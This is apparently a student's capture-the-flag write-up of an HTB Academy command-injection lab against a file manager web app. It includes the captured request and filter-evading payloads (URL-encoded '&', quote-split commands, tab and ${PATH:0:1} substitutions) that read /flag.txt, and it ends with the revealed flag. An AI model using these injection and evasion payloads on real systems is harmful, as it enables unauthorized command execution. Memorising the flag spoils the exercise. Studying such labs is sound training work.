Skills Assessment
Task
You are contracted to perform a penetration test for a company, and through your pentest, you stumble upon an interesting file manager web application. As file managers tend to execute system commands, you are interested in testing for command injection vulnerabilities.
Use the various techniques presented in this module to detect a command injection vulnerability and then exploit it, evading any filters in place.
What is the content of ‘/flag.txt’?
Attempt
Since this is an os command injection task, I first tried to find the most system related task on the page. I tried to move a file and got this error Error while moving: mv: '/var/www/html/files/51459716.txt' and '/var/www/html/files/51459716.txt' are the same file.
Looks like the system uses the mv command and when I specify the same file that command fails. Captured the request in burp:
GET /index.php?to=&from=51459716.txt&finish=1&move=1 HTTP/1.1
Host: 94.237.59.30:50049
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://94.237.59.30:50049/index.php?to=&from=51459716.txt
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=fm04b3rht5ibn7cqtivt9hukh8; filemanager=u8eiqp9e9ccn3aq92krq3sg03r
Connection: keep-alive
I injected ;whoami; into both to and from parameters. Got <p class="message alert">Malicious request denied!</p> message. to=&whoami&from=&whoami& passed but fro & to work in url I needed to url encode it.
This payload worked:
/index.php?to=%26wh'o'ami&from=%26'i'd&finish=1&move=1
Result:
Error while moving: id: '/var/www/html/files/': no such user
mv: missing destination file operand after '/var/www/html/files/'
Try 'mv --help' for more information.
www-data
So I confirmed I could inject the payload to the to parameter.
Final payload:
/index.php?to=%26c'a't%09${PATH:0:1}flag.txt&from=%26'i'd&finish=1&move=1
Got the flag:
<p class="message alert">Error while moving: HTB{c0mm4nd3r_1nj3c70r}<br>